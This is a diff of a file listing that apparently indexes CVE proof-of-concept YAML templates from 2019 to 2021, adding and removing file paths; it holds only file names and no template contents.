./poc/cve/cve-2019-11510-3736.yaml
./poc/cve/cve-2019-11510-3737.yaml
@@ -39609,7 +39573,7 @@
./poc/cve/cve-2019-12725-3799.yaml
./poc/cve/cve-2019-12725-3800.yaml
./poc/cve/cve-2019-12725-3801.yaml
-./poc/cve/cve-2019-13101-3802.yaml
+./poc/cve/cve-2019-12962(1).yaml
./poc/cve/cve-2019-13101-3803.yaml
./poc/cve/cve-2019-13101-3804.yaml
./poc/cve/cve-2019-13101-3805.yaml
@@ -39645,6 +39609,7 @@
./poc/cve/cve-2019-14223-3835.yaml
./poc/cve/cve-2019-14223-3836.yaml
./poc/cve/cve-2019-14223.yaml
+./poc/cve/cve-2019-14251(1).yaml
./poc/cve/cve-2019-14251-3837.yaml
./poc/cve/cve-2019-14251-3838.yaml
./poc/cve/cve-2019-14312-3839.yaml
@@ -39699,6 +39664,7 @@
./poc/cve/cve-2019-15713-3884.yaml
./poc/cve/cve-2019-15713-3885.yaml
./poc/cve/cve-2019-15713-3886.yaml
+./poc/cve/cve-2019-15713-3887.yaml
./poc/cve/cve-2019-15858-3888.yaml
./poc/cve/cve-2019-15858-3889.yaml
./poc/cve/cve-2019-15858-3890.yaml
@@ -39725,12 +39691,10 @@
./poc/cve/cve-2019-16097-3911.yaml
./poc/cve/cve-2019-16097-3912.yaml
./poc/cve/cve-2019-16097-3913.yaml
-./poc/cve/cve-2019-16097.yaml
./poc/cve/cve-2019-16123-3914.yaml
./poc/cve/cve-2019-16123-3915.yaml
./poc/cve/cve-2019-16123-3916.yaml
./poc/cve/cve-2019-16123-3917.yaml
-./poc/cve/cve-2019-16123-3918.yaml
./poc/cve/cve-2019-16278-3919.yaml
./poc/cve/cve-2019-16278-3920.yaml
./poc/cve/cve-2019-16278-3921.yaml
@@ -39738,6 +39702,7 @@
./poc/cve/cve-2019-16278-3923.yaml
./poc/cve/cve-2019-16278-3924.yaml
./poc/cve/cve-2019-16278-3925.yaml
+./poc/cve/cve-2019-16278.yaml
./poc/cve/cve-2019-16313-3926.yaml
./poc/cve/cve-2019-16313-3927.yaml
./poc/cve/cve-2019-16313-3928.yaml
@@ -39779,7 +39744,6 @@
./poc/cve/cve-2019-16920-3960.yaml
./poc/cve/cve-2019-16920-3961.yaml
./poc/cve/cve-2019-16920-3962.yaml
-./poc/cve/cve-2019-16931(1).yaml
./poc/cve/cve-2019-16931-3963.yaml
./poc/cve/cve-2019-16932(1).yaml
./poc/cve/cve-2019-16932-3964.yaml
@@ -39801,7 +39765,6 @@
./poc/cve/cve-2019-17382-3979.yaml
./poc/cve/cve-2019-17382-4.yaml
./poc/cve/cve-2019-17418-3980.yaml
-./poc/cve/cve-2019-17418-3981.yaml
./poc/cve/cve-2019-17418-3982.yaml
./poc/cve/cve-2019-17444-3983.yaml
./poc/cve/cve-2019-17444-3984.yaml
@@ -39824,6 +39787,7 @@
./poc/cve/cve-2019-17558-4000.yaml
./poc/cve/cve-2019-17558-4001.yaml
./poc/cve/cve-2019-17558-4002.yaml
+./poc/cve/cve-2019-17558.yaml
./poc/cve/cve-2019-1821-4003.yaml
./poc/cve/cve-2019-1821-4004.yaml
./poc/cve/cve-2019-18371-4005.yaml
@@ -39840,8 +39804,11 @@
./poc/cve/cve-2019-18394-4016.yaml
./poc/cve/cve-2019-18394-4017.yaml
./poc/cve/cve-2019-18394-4018.yaml
+./poc/cve/cve-2019-18394.yaml
+./poc/cve/cve-2019-18665(1).yaml
./poc/cve/cve-2019-18665-4019.yaml
./poc/cve/cve-2019-18665-4020.yaml
+./poc/cve/cve-2019-18818-4021.yaml
./poc/cve/cve-2019-18818-4022.yaml
./poc/cve/cve-2019-18818-4023.yaml
./poc/cve/cve-2019-18818-4024.yaml
@@ -39859,6 +39826,7 @@
./poc/cve/cve-2019-19368-4036.yaml
./poc/cve/cve-2019-19368-4037.yaml
./poc/cve/cve-2019-19368-4038.yaml
+./poc/cve/cve-2019-19368.yaml
./poc/cve/cve-2019-19719-4039.yaml
./poc/cve/cve-2019-19719-4040.yaml
./poc/cve/cve-2019-19719-4041.yaml
@@ -39873,7 +39841,6 @@
./poc/cve/cve-2019-19824-4050.yaml
./poc/cve/cve-2019-19824-4051.yaml
./poc/cve/cve-2019-19824-4052.yaml
-./poc/cve/cve-2019-19824-4053.yaml
./poc/cve/cve-2019-19908-4054.yaml
./poc/cve/cve-2019-19908-4055.yaml
./poc/cve/cve-2019-19908-4056.yaml
@@ -39909,10 +39876,9 @@
./poc/cve/cve-2019-20183-4084.yaml
./poc/cve/cve-2019-20183-4085.yaml
./poc/cve/cve-2019-20183-4086.yaml
-./poc/cve/cve-2019-20210(1).yaml
-./poc/cve/cve-2019-20224(1).yaml
./poc/cve/cve-2019-20224-4087.yaml
./poc/cve/cve-2019-20354(1).yaml
+./poc/cve/cve-2019-20933(1).yaml
./poc/cve/cve-2019-2578-1.yaml
./poc/cve/cve-2019-2578-2.yaml
./poc/cve/cve-2019-2578-4088.yaml
@@ -39928,7 +39894,6 @@
./poc/cve/cve-2019-2588-4098.yaml
./poc/cve/cve-2019-2588-4099.yaml
./poc/cve/cve-2019-2588-4100.yaml
-./poc/cve/cve-2019-2616(1).yaml
./poc/cve/cve-2019-2616-4101.yaml
./poc/cve/cve-2019-2616-4102.yaml
./poc/cve/cve-2019-2616-4103.yaml
@@ -39945,7 +39910,6 @@
./poc/cve/cve-2019-2729-4114.yaml
./poc/cve/cve-2019-2729-4115.yaml
./poc/cve/cve-2019-2767-4116.yaml
-./poc/cve/cve-2019-2767-4117.yaml
./poc/cve/cve-2019-2767-4118.yaml
./poc/cve/cve-2019-2767-4119.yaml
./poc/cve/cve-2019-2767-4120.yaml
@@ -40012,6 +39976,7 @@
./poc/cve/cve-2019-6112-4176.yaml
./poc/cve/cve-2019-6112-4177.yaml
./poc/cve/cve-2019-6112-4178.yaml
+./poc/cve/cve-2019-6340(1).yaml
./poc/cve/cve-2019-6340-4179.yaml
./poc/cve/cve-2019-6340-4180.yaml
./poc/cve/cve-2019-6340-4181.yaml
@@ -40039,6 +40004,7 @@
./poc/cve/cve-2019-7238-4204.yaml
./poc/cve/cve-2019-7238-4205.yaml
./poc/cve/cve-2019-7238-4206.yaml
+./poc/cve/cve-2019-7238-4207.yaml
./poc/cve/cve-2019-7254-1.yaml
./poc/cve/cve-2019-7254-2.yaml
./poc/cve/cve-2019-7254-4208.yaml
@@ -40068,6 +40034,7 @@
./poc/cve/cve-2019-7543-2.yaml
./poc/cve/cve-2019-7543-4231.yaml
./poc/cve/cve-2019-7543-4232.yaml
+./poc/cve/cve-2019-7609-4233.yaml
./poc/cve/cve-2019-7609-4234.yaml
./poc/cve/cve-2019-7609-4235.yaml
./poc/cve/cve-2019-7609-4236.yaml
@@ -40087,7 +40054,6 @@
./poc/cve/cve-2019-8446-4249.yaml
./poc/cve/cve-2019-8446-4250.yaml
./poc/cve/cve-2019-8446-4251.yaml
-./poc/cve/cve-2019-8446-4252.yaml
./poc/cve/cve-2019-8449-4253.yaml
./poc/cve/cve-2019-8449-4254.yaml
./poc/cve/cve-2019-8449-4255.yaml
@@ -40109,11 +40075,11 @@
./poc/cve/cve-2019-8903-4271.yaml
./poc/cve/cve-2019-8903-4272.yaml
./poc/cve/cve-2019-8903-4273.yaml
-./poc/cve/cve-2019-8903.yaml
./poc/cve/cve-2019-8937-4274.yaml
./poc/cve/cve-2019-8937-4275.yaml
./poc/cve/cve-2019-8937-4276.yaml
./poc/cve/cve-2019-8937-4277.yaml
+./poc/cve/cve-2019-8937-4278.yaml
./poc/cve/cve-2019-8982-4279.yaml
./poc/cve/cve-2019-8982-4280.yaml
./poc/cve/cve-2019-8982-4281.yaml
@@ -40128,7 +40094,6 @@
./poc/cve/cve-2019-9041-4289.yaml
./poc/cve/cve-2019-9041-4290.yaml
./poc/cve/cve-2019-9041-4291.yaml
-./poc/cve/cve-2019-9082-4292.yaml
./poc/cve/cve-2019-9082-4293.yaml
./poc/cve/cve-2019-9082-4294.yaml
./poc/cve/cve-2019-9618-4295.yaml
@@ -40156,6 +40121,7 @@
./poc/cve/cve-2019-9733-4315.yaml
./poc/cve/cve-2019-9733-4316.yaml
./poc/cve/cve-2019-9733.yaml
+./poc/cve/cve-2019-9915(1).yaml
./poc/cve/cve-2019-9915-4317.yaml
./poc/cve/cve-2019-9922-4318.yaml
./poc/cve/cve-2019-9922-4319.yaml
@@ -40181,6 +40147,7 @@
./poc/cve/cve-2020-0618-4338.yaml
./poc/cve/cve-2020-0618-4339.yaml
./poc/cve/cve-2020-0618.yaml
+./poc/cve/cve-2020-10124(1).yaml
./poc/cve/cve-2020-10148-4340.yaml
./poc/cve/cve-2020-10148-4341.yaml
./poc/cve/cve-2020-10148-4342.yaml
@@ -40198,7 +40165,6 @@
./poc/cve/cve-2020-10220-4354.yaml
./poc/cve/cve-2020-10220-4355.yaml
./poc/cve/cve-2020-10220-4356.yaml
-./poc/cve/cve-2020-10220.yaml
./poc/cve/cve-2020-10546-4357.yaml
./poc/cve/cve-2020-10546-4358.yaml
./poc/cve/cve-2020-10546-4359.yaml
@@ -40240,7 +40206,6 @@
./poc/cve/cve-2020-11110-4394.yaml
./poc/cve/cve-2020-11450-4395.yaml
./poc/cve/cve-2020-11450-4396.yaml
-./poc/cve/cve-2020-11455-4397.yaml
./poc/cve/cve-2020-11455-4398.yaml
./poc/cve/cve-2020-11455-4399.yaml
./poc/cve/cve-2020-11455-4400.yaml
@@ -40257,6 +40222,7 @@
./poc/cve/cve-2020-11530-4410.yaml
./poc/cve/cve-2020-11530-4411.yaml
./poc/cve/cve-2020-11530-4412.yaml
+./poc/cve/cve-2020-11530.yaml
./poc/cve/cve-2020-11546-4413.yaml
./poc/cve/cve-2020-11546-4414.yaml
./poc/cve/cve-2020-11547-1.yaml
@@ -40272,6 +40238,7 @@
./poc/cve/cve-2020-11710-4422.yaml
./poc/cve/cve-2020-11710-4423.yaml
./poc/cve/cve-2020-11710-4424.yaml
+./poc/cve/cve-2020-11738(1).yaml
./poc/cve/cve-2020-11738-1.yaml
./poc/cve/cve-2020-11738-2.yaml
./poc/cve/cve-2020-11738-4425.yaml
@@ -40296,6 +40263,7 @@
./poc/cve/cve-2020-11930-4444.yaml
./poc/cve/cve-2020-11930-4445.yaml
./poc/cve/cve-2020-11930-4446.yaml
+./poc/cve/cve-2020-11978(1).yaml
./poc/cve/cve-2020-11978-4447.yaml
./poc/cve/cve-2020-11978-4448.yaml
./poc/cve/cve-2020-11978-4449.yaml
@@ -40338,8 +40306,10 @@
./poc/cve/cve-2020-12800-4486.yaml
./poc/cve/cve-2020-12800-4487.yaml
./poc/cve/cve-2020-12800-4488.yaml
+./poc/cve/cve-2020-13117-4489.yaml
./poc/cve/cve-2020-13117-4490.yaml
./poc/cve/cve-2020-13117-4491.yaml
+./poc/cve/cve-2020-13121(1).yaml
./poc/cve/cve-2020-13158-4492.yaml
./poc/cve/cve-2020-13158-4493.yaml
./poc/cve/cve-2020-13158-4494.yaml
@@ -40387,6 +40357,7 @@
./poc/cve/cve-2020-13942.yaml
./poc/cve/cve-2020-13945-4533.yaml
./poc/cve/cve-2020-13945-4534.yaml
+./poc/cve/cve-2020-13945-4535.yaml
./poc/cve/cve-2020-14092-4536.yaml
./poc/cve/cve-2020-14092-4537.yaml
./poc/cve/cve-2020-14092-4538.yaml
@@ -40402,8 +40373,6 @@
./poc/cve/cve-2020-14181-4549.yaml
./poc/cve/cve-2020-14181-4550.yaml
./poc/cve/cve-2020-14181-4551.yaml
-./poc/cve/cve-2020-14181.yaml
-./poc/cve/cve-2020-14408(1).yaml
./poc/cve/cve-2020-14413-4552.yaml
./poc/cve/cve-2020-14413-4553.yaml
./poc/cve/cve-2020-14413-4554.yaml
@@ -40433,6 +40402,7 @@
./poc/cve/cve-2020-14882-4577.yaml
./poc/cve/cve-2020-14882-4578.yaml
./poc/cve/cve-2020-14882-4579.yaml
+./poc/cve/cve-2020-14882.yaml
./poc/cve/cve-2020-14883-1.yaml
./poc/cve/cve-2020-14883-2.yaml
./poc/cve/cve-2020-14883-4580.yaml
@@ -40561,7 +40531,6 @@
./poc/cve/cve-2020-18268-4703.yaml
./poc/cve/cve-2020-19282-4704.yaml
./poc/cve/cve-2020-19282-4705.yaml
-./poc/cve/cve-2020-19282-4706.yaml
./poc/cve/cve-2020-19283-4707.yaml
./poc/cve/cve-2020-19283-4708.yaml
./poc/cve/cve-2020-19283-4709.yaml
@@ -40569,6 +40538,7 @@
./poc/cve/cve-2020-19295-4711.yaml
./poc/cve/cve-2020-19295-4712.yaml
./poc/cve/cve-2020-19360-4713.yaml
+./poc/cve/cve-2020-19360-4714.yaml
./poc/cve/cve-2020-1938-4715.yaml
./poc/cve/cve-2020-1938-4716.yaml
./poc/cve/cve-2020-1938-4717.yaml
@@ -40587,7 +40557,6 @@
./poc/cve/cve-2020-19719.yaml
./poc/cve/cve-2020-2036-1.yaml
./poc/cve/cve-2020-2036-2.yaml
-./poc/cve/cve-2020-2036-4730.yaml
./poc/cve/cve-2020-2036-4731.yaml
./poc/cve/cve-2020-2036-4732.yaml
./poc/cve/cve-2020-2036-4733.yaml
@@ -40597,7 +40566,6 @@
./poc/cve/cve-2020-2096-4737.yaml
./poc/cve/cve-2020-2096-4738.yaml
./poc/cve/cve-2020-2096-4739.yaml
-./poc/cve/cve-2020-20982-4740.yaml
./poc/cve/cve-2020-20982-4741.yaml
./poc/cve/cve-2020-20982-4742.yaml
./poc/cve/cve-2020-20982-4743.yaml
@@ -40624,13 +40592,13 @@
./poc/cve/cve-2020-22209(1).yaml
./poc/cve/cve-2020-22210(1).yaml
./poc/cve/cve-2020-22210-4760.yaml
-./poc/cve/cve-2020-22211(1).yaml
./poc/cve/cve-2020-22840-4761.yaml
./poc/cve/cve-2020-22840-4763.yaml
./poc/cve/cve-2020-22840-4764.yaml
./poc/cve/cve-2020-22840-4765.yaml
./poc/cve/cve-2020-22840-4766.yaml
./poc/cve/cve-2020-22840-4767.yaml
+./poc/cve/cve-2020-22840.yaml
./poc/cve/cve-2020-23015-4768.yaml
./poc/cve/cve-2020-23015-4769.yaml
./poc/cve/cve-2020-23015-4770.yaml
@@ -40669,13 +40637,13 @@
./poc/cve/cve-2020-24223-4802.yaml
./poc/cve/cve-2020-24223-4803.yaml
./poc/cve/cve-2020-24223-4804.yaml
+./poc/cve/cve-2020-24223.yaml
./poc/cve/cve-2020-24312-4805.yaml
./poc/cve/cve-2020-24312-4806.yaml
./poc/cve/cve-2020-24312-4807.yaml
./poc/cve/cve-2020-24312-4808.yaml
./poc/cve/cve-2020-24312-4809.yaml
./poc/cve/cve-2020-24312-4810.yaml
-./poc/cve/cve-2020-24391-4811.yaml
./poc/cve/cve-2020-24391-4812.yaml
./poc/cve/cve-2020-24391-4813.yaml
./poc/cve/cve-2020-24550-4814.yaml
@@ -40760,7 +40728,6 @@
./poc/cve/cve-2020-25540-4890.yaml
./poc/cve/cve-2020-25540-4891.yaml
./poc/cve/cve-2020-25540-4892.yaml
-./poc/cve/cve-2020-25540.yaml
./poc/cve/cve-2020-2555.yaml
./poc/cve/cve-2020-25780-4893.yaml
./poc/cve/cve-2020-25780-4894.yaml
@@ -40812,7 +40779,6 @@
./poc/cve/cve-2020-27361-4947.yaml
./poc/cve/cve-2020-27467-4948.yaml
./poc/cve/cve-2020-27467-4949.yaml
-./poc/cve/cve-2020-27467-4950.yaml
./poc/cve/cve-2020-27467-4951.yaml
./poc/cve/cve-2020-27735-4952.yaml
./poc/cve/cve-2020-27735-4953.yaml
@@ -40849,6 +40815,7 @@
./poc/cve/cve-2020-28871-4986.yaml
./poc/cve/cve-2020-28871-4987.yaml
./poc/cve/cve-2020-28871-4988.yaml
+./poc/cve/cve-2020-28976-4989.yaml
./poc/cve/cve-2020-28976-4990.yaml
./poc/cve/cve-2020-28976-4991.yaml
./poc/cve/cve-2020-29164-4992.yaml
@@ -40859,12 +40826,14 @@
./poc/cve/cve-2020-29164-4997.yaml
./poc/cve/cve-2020-29227-4998.yaml
./poc/cve/cve-2020-29227-4999.yaml
+./poc/cve/cve-2020-29227-5000.yaml
./poc/cve/cve-2020-29227-5001.yaml
./poc/cve/cve-2020-29395-5002.yaml
./poc/cve/cve-2020-29395-5003.yaml
./poc/cve/cve-2020-29395-5004.yaml
./poc/cve/cve-2020-29395-5005.yaml
./poc/cve/cve-2020-29395-5006.yaml
+./poc/cve/cve-2020-29395.yaml
./poc/cve/cve-2020-29453-1.yaml
./poc/cve/cve-2020-29453-5007.yaml
./poc/cve/cve-2020-29453-5008.yaml
@@ -40877,6 +40846,7 @@
./poc/cve/cve-2020-3187-5015.yaml
./poc/cve/cve-2020-3187-5016.yaml
./poc/cve/cve-2020-3187-5017.yaml
+./poc/cve/cve-2020-3452(1).yaml
./poc/cve/cve-2020-3452-1.yaml
./poc/cve/cve-2020-3452-2.yaml
./poc/cve/cve-2020-3452-5018.yaml
@@ -40934,6 +40904,7 @@
./poc/cve/cve-2020-35736-5072.yaml
./poc/cve/cve-2020-35749-5073.yaml
./poc/cve/cve-2020-35749-5074.yaml
+./poc/cve/cve-2020-35749-5075.yaml
./poc/cve/cve-2020-35774-5076.yaml
./poc/cve/cve-2020-35774-5077.yaml
./poc/cve/cve-2020-35774-5078.yaml
@@ -40987,6 +40958,7 @@
./poc/cve/cve-2020-36365-5124.yaml
./poc/cve/cve-2020-36365-5125.yaml
./poc/cve/cve-2020-36365-5126.yaml
+./poc/cve/cve-2020-36510(1).yaml
./poc/cve/cve-2020-3952-5127.yaml
./poc/cve/cve-2020-3952-5128.yaml
./poc/cve/cve-2020-3952-5129.yaml
@@ -41088,7 +41060,6 @@
./poc/cve/cve-2020-6287-5216.yaml
./poc/cve/cve-2020-6287-5217.yaml
./poc/cve/cve-2020-6287-5218.yaml
-./poc/cve/cve-2020-6287.yaml
./poc/cve/cve-2020-6308-5219.yaml
./poc/cve/cve-2020-6308-5220.yaml
./poc/cve/cve-2020-6308-5221.yaml
@@ -41141,7 +41112,6 @@
./poc/cve/cve-2020-7961-5266.yaml
./poc/cve/cve-2020-7961-5267.yaml
./poc/cve/cve-2020-7961-5268.yaml
-./poc/cve/cve-2020-7980(1).yaml
./poc/cve/cve-2020-8091-5269.yaml
./poc/cve/cve-2020-8091-5270.yaml
./poc/cve/cve-2020-8091-5271.yaml
@@ -41183,6 +41153,7 @@
./poc/cve/cve-2020-8194-5305.yaml
./poc/cve/cve-2020-8194-5306.yaml
./poc/cve/cve-2020-8194-5307.yaml
+./poc/cve/cve-2020-8194.yaml
./poc/cve/cve-2020-8209-5308.yaml
./poc/cve/cve-2020-8209-5309.yaml
./poc/cve/cve-2020-8209-5310.yaml
@@ -41193,6 +41164,7 @@
./poc/cve/cve-2020-8209-5315.yaml
./poc/cve/cve-2020-8451.yaml
./poc/cve/cve-2020-8497-5316.yaml
+./poc/cve/cve-2020-8497-5317.yaml
./poc/cve/cve-2020-8512-5318.yaml
./poc/cve/cve-2020-8512-5319.yaml
./poc/cve/cve-2020-8512-5320.yaml
@@ -41205,11 +41177,13 @@
./poc/cve/cve-2020-8515-5327.yaml
./poc/cve/cve-2020-8515-5328.yaml
./poc/cve/cve-2020-8515-5329.yaml
+./poc/cve/cve-2020-8641-5330.yaml
./poc/cve/cve-2020-8641-5331.yaml
./poc/cve/cve-2020-8641-5332.yaml
./poc/cve/cve-2020-8641-5333.yaml
./poc/cve/cve-2020-8641-5334.yaml
./poc/cve/cve-2020-8644-5335.yaml
+./poc/cve/cve-2020-8654(1).yaml
./poc/cve/cve-2020-8771-5336.yaml
./poc/cve/cve-2020-8771-5337.yaml
./poc/cve/cve-2020-8771-5338.yaml
@@ -41234,6 +41208,7 @@
./poc/cve/cve-2020-9036-5357.yaml
./poc/cve/cve-2020-9036-5358.yaml
./poc/cve/cve-2020-9036-5359.yaml
+./poc/cve/cve-2020-9043(1).yaml
./poc/cve/cve-2020-9047-5360.yaml
./poc/cve/cve-2020-9047-5361.yaml
./poc/cve/cve-2020-9047-5362.yaml
@@ -41308,6 +41283,7 @@
./poc/cve/cve-2020-9757-5424.yaml
./poc/cve/cve-2020-9757-5425.yaml
./poc/cve/cve-2020-9757-5426.yaml
+./poc/cve/cve-20200924a.yaml
./poc/cve/cve-2020–26073-4901.yaml
./poc/cve/cve-2020–26073-4903.yaml
./poc/cve/cve-2020–26073-4905.yaml
@@ -41328,6 +41304,7 @@
./poc/cve/cve-2021-1499-5440.yaml
./poc/cve/cve-2021-20031-5441.yaml
./poc/cve/cve-2021-20031-5442.yaml
+./poc/cve/cve-2021-20038-5443.yaml
./poc/cve/cve-2021-20038-5444.yaml
./poc/cve/cve-2021-20038-5445.yaml
./poc/cve/cve-2021-20038-5446.yaml
@@ -41375,7 +41352,6 @@
./poc/cve/cve-2021-21234-5489.yaml
./poc/cve/cve-2021-21287-5490.yaml
./poc/cve/cve-2021-21287-5491.yaml
-./poc/cve/cve-2021-21287-5492.yaml
./poc/cve/cve-2021-21307-5493.yaml
./poc/cve/cve-2021-21307-5494.yaml
./poc/cve/cve-2021-21307-5495.yaml
@@ -41412,16 +41388,19 @@
./poc/cve/cve-2021-21479-5524.yaml
./poc/cve/cve-2021-21479-5525.yaml
./poc/cve/cve-2021-21479-5526.yaml
+./poc/cve/cve-2021-21745(1).yaml
./poc/cve/cve-2021-21745-5527.yaml
./poc/cve/cve-2021-21799(1).yaml
./poc/cve/cve-2021-21800(1).yaml
./poc/cve/cve-2021-21801-5528.yaml
./poc/cve/cve-2021-21801-5529.yaml
./poc/cve/cve-2021-21801-5530.yaml
+./poc/cve/cve-2021-21801-5531.yaml
./poc/cve/cve-2021-21802-5532.yaml
./poc/cve/cve-2021-21802-5533.yaml
./poc/cve/cve-2021-21802-5534.yaml
./poc/cve/cve-2021-21802-5535.yaml
+./poc/cve/cve-2021-21803-5536.yaml
./poc/cve/cve-2021-21803-5537.yaml
./poc/cve/cve-2021-21803-5538.yaml
./poc/cve/cve-2021-21803-5539.yaml
@@ -41467,6 +41446,7 @@
./poc/cve/cve-2021-22053-5579.yaml
./poc/cve/cve-2021-22053-5580.yaml
./poc/cve/cve-2021-22053-5581.yaml
+./poc/cve/cve-2021-22054(1).yaml
./poc/cve/cve-2021-22054-5582.yaml
./poc/cve/cve-2021-22122-1.yaml
./poc/cve/cve-2021-22122-2.yaml
@@ -41478,6 +41458,7 @@
./poc/cve/cve-2021-22122-5588.yaml
./poc/cve/cve-2021-22145-5589.yaml
./poc/cve/cve-2021-22145-5590.yaml
+./poc/cve/cve-2021-22145-5591.yaml
./poc/cve/cve-2021-22145-5592.yaml
./poc/cve/cve-2021-22205-5593.yaml
./poc/cve/cve-2021-22205-5594.yaml
@@ -41487,7 +41468,6 @@
./poc/cve/cve-2021-22214-5598.yaml
./poc/cve/cve-2021-22214-5599.yaml
./poc/cve/cve-2021-22214-5600.yaml
-./poc/cve/cve-2021-22214-5601.yaml
./poc/cve/cve-2021-22214-5602.yaml
./poc/cve/cve-2021-22214-5603.yaml
./poc/cve/cve-2021-22873-1.yaml
@@ -41503,6 +41483,7 @@
./poc/cve/cve-2021-22873-5610.yaml
./poc/cve/cve-2021-22873-6.yaml
./poc/cve/cve-2021-22986-5611.yaml
+./poc/cve/cve-2021-22986-5612.yaml
./poc/cve/cve-2021-22986-5613.yaml
./poc/cve/cve-2021-22986-5614.yaml
./poc/cve/cve-2021-22986-5615.yaml
@@ -41511,6 +41492,7 @@
./poc/cve/cve-2021-23241-5618.yaml
./poc/cve/cve-2021-23241-5619.yaml
./poc/cve/cve-2021-23241-5620.yaml
+./poc/cve/cve-2021-23241-5621.yaml
./poc/cve/cve-2021-23241-5622.yaml
./poc/cve/cve-2021-23241-5623.yaml
./poc/cve/cve-2021-23241-5624.yaml
@@ -41520,7 +41502,6 @@
./poc/cve/cve-2021-24146-5628.yaml
./poc/cve/cve-2021-24146-5629.yaml
./poc/cve/cve-2021-24146-5630.yaml
-./poc/cve/cve-2021-24146-5631.yaml
./poc/cve/cve-2021-24176-5632.yaml
./poc/cve/cve-2021-24176-5633.yaml
./poc/cve/cve-2021-24176-5634.yaml
@@ -41543,7 +41524,6 @@
./poc/cve/cve-2021-24235-5651.yaml
./poc/cve/cve-2021-24235-5652.yaml
./poc/cve/cve-2021-24235-5653.yaml
-./poc/cve/cve-2021-24236(1).yaml
./poc/cve/cve-2021-24237-5654.yaml
./poc/cve/cve-2021-24237-5655.yaml
./poc/cve/cve-2021-24237-5656.yaml
@@ -41551,7 +41531,6 @@
./poc/cve/cve-2021-24274-5658.yaml
./poc/cve/cve-2021-24274-5659.yaml
./poc/cve/cve-2021-24274-5660.yaml
-./poc/cve/cve-2021-24275-5661.yaml
./poc/cve/cve-2021-24275-5662.yaml
./poc/cve/cve-2021-24275-5663.yaml
./poc/cve/cve-2021-24276-5665.yaml
@@ -41559,13 +41538,10 @@
./poc/cve/cve-2021-24278-5667.yaml
./poc/cve/cve-2021-24278-5668.yaml
./poc/cve/cve-2021-24278-5669.yaml
-./poc/cve/cve-2021-24284(1).yaml
./poc/cve/cve-2021-24285-5670.yaml
./poc/cve/cve-2021-24285-5671.yaml
./poc/cve/cve-2021-24285-5672.yaml
-./poc/cve/cve-2021-24285-5673.yaml
./poc/cve/cve-2021-24285-5674.yaml
-./poc/cve/cve-2021-24286(1).yaml
./poc/cve/cve-2021-24288-5675.yaml
./poc/cve/cve-2021-24288-5676.yaml
./poc/cve/cve-2021-24288-5677.yaml
@@ -41595,6 +41571,7 @@
./poc/cve/cve-2021-24320-5700.yaml
./poc/cve/cve-2021-24335-5701.yaml
./poc/cve/cve-2021-24335-5702.yaml
+./poc/cve/cve-2021-24335-5703.yaml
./poc/cve/cve-2021-24335-5704.yaml
./poc/cve/cve-2021-24335-5705.yaml
./poc/cve/cve-2021-24340-5706.yaml
@@ -41611,6 +41588,7 @@
./poc/cve/cve-2021-24358-5718.yaml
./poc/cve/cve-2021-24364-5719.yaml
./poc/cve/cve-2021-24364-5720.yaml
+./poc/cve/cve-2021-24364-5721.yaml
./poc/cve/cve-2021-24387-5722.yaml
./poc/cve/cve-2021-24387-5723.yaml
./poc/cve/cve-2021-24387-5725.yaml
@@ -41635,13 +41613,13 @@
./poc/cve/cve-2021-24472-5744.yaml
./poc/cve/cve-2021-24472-5745.yaml
./poc/cve/cve-2021-24472-5746.yaml
+./poc/cve/cve-2021-24488(1).yaml
./poc/cve/cve-2021-24495-1.yaml
./poc/cve/cve-2021-24495-2.yaml
./poc/cve/cve-2021-24495-5747.yaml
./poc/cve/cve-2021-24495-5748.yaml
./poc/cve/cve-2021-24495-5749.yaml
./poc/cve/cve-2021-24495-5750.yaml
-./poc/cve/cve-2021-24498-5751.yaml
./poc/cve/cve-2021-24498-5752.yaml
./poc/cve/cve-2021-24498-5753.yaml
./poc/cve/cve-2021-24498-5754.yaml
@@ -41659,7 +41637,6 @@
./poc/cve/cve-2021-24762-5766.yaml
./poc/cve/cve-2021-24838-5767.yaml
./poc/cve/cve-2021-24838-5768.yaml
-./poc/cve/cve-2021-24838-5769.yaml
./poc/cve/cve-2021-24838-5770.yaml
./poc/cve/cve-2021-24926-5771.yaml
./poc/cve/cve-2021-24926-5772.yaml
@@ -41679,7 +41656,6 @@
./poc/cve/cve-2021-25028-5785.yaml
./poc/cve/cve-2021-25028-5786.yaml
./poc/cve/cve-2021-25028-5787.yaml
-./poc/cve/cve-2021-25033(1).yaml
./poc/cve/cve-2021-25033-5788.yaml
./poc/cve/cve-2021-25052-5789.yaml
./poc/cve/cve-2021-25052-5790.yaml
@@ -41693,12 +41669,13 @@
./poc/cve/cve-2021-25074-5798.yaml
./poc/cve/cve-2021-25074-5799.yaml
./poc/cve/cve-2021-25074-5800.yaml
-./poc/cve/cve-2021-25075(1).yaml
+./poc/cve/cve-2021-25085(1).yaml
./poc/cve/cve-2021-25111-5801.yaml
./poc/cve/cve-2021-25111-5802.yaml
./poc/cve/cve-2021-25111-5803.yaml
./poc/cve/cve-2021-25112-5804.yaml
./poc/cve/cve-2021-25112-5805.yaml
+./poc/cve/cve-2021-25118(1).yaml
./poc/cve/cve-2021-25120-5806.yaml
./poc/cve/cve-2021-25281-5807.yaml
./poc/cve/cve-2021-25281-5808.yaml
@@ -41746,6 +41723,7 @@
./poc/cve/cve-2021-26084-8.yaml
./poc/cve/cve-2021-26084-9-5834.yaml
./poc/cve/cve-2021-26084-9.yaml
+./poc/cve/cve-2021-26085(1).yaml
./poc/cve/cve-2021-26085-5840.yaml
./poc/cve/cve-2021-26085-5841.yaml
./poc/cve/cve-2021-26085-5842.yaml
@@ -41818,7 +41796,6 @@
./poc/cve/cve-2021-27358-5908.yaml
./poc/cve/cve-2021-27358-5909.yaml
./poc/cve/cve-2021-27358-5910.yaml
-./poc/cve/cve-2021-27519(1).yaml
./poc/cve/cve-2021-27561-5911.yaml
./poc/cve/cve-2021-27561-5912.yaml
./poc/cve/cve-2021-27561-5913.yaml
@@ -41830,6 +41807,7 @@
./poc/cve/cve-2021-27651-5919.yaml
./poc/cve/cve-2021-27651-5920.yaml
./poc/cve/cve-2021-27651-5921.yaml
+./poc/cve/cve-2021-27748(1).yaml
./poc/cve/cve-2021-27748-5922.yaml
./poc/cve/cve-2021-27850-5923.yaml
./poc/cve/cve-2021-27850-5924.yaml
@@ -41855,7 +41833,6 @@
./poc/cve/cve-2021-28149-1.yaml
./poc/cve/cve-2021-28149-2.yaml
./poc/cve/cve-2021-28149-5942.yaml
-./poc/cve/cve-2021-28149-5943.yaml
./poc/cve/cve-2021-28149-5944.yaml
./poc/cve/cve-2021-28149-5945.yaml
./poc/cve/cve-2021-28149-5946.yaml
@@ -41863,7 +41840,6 @@
./poc/cve/cve-2021-28150-2.yaml
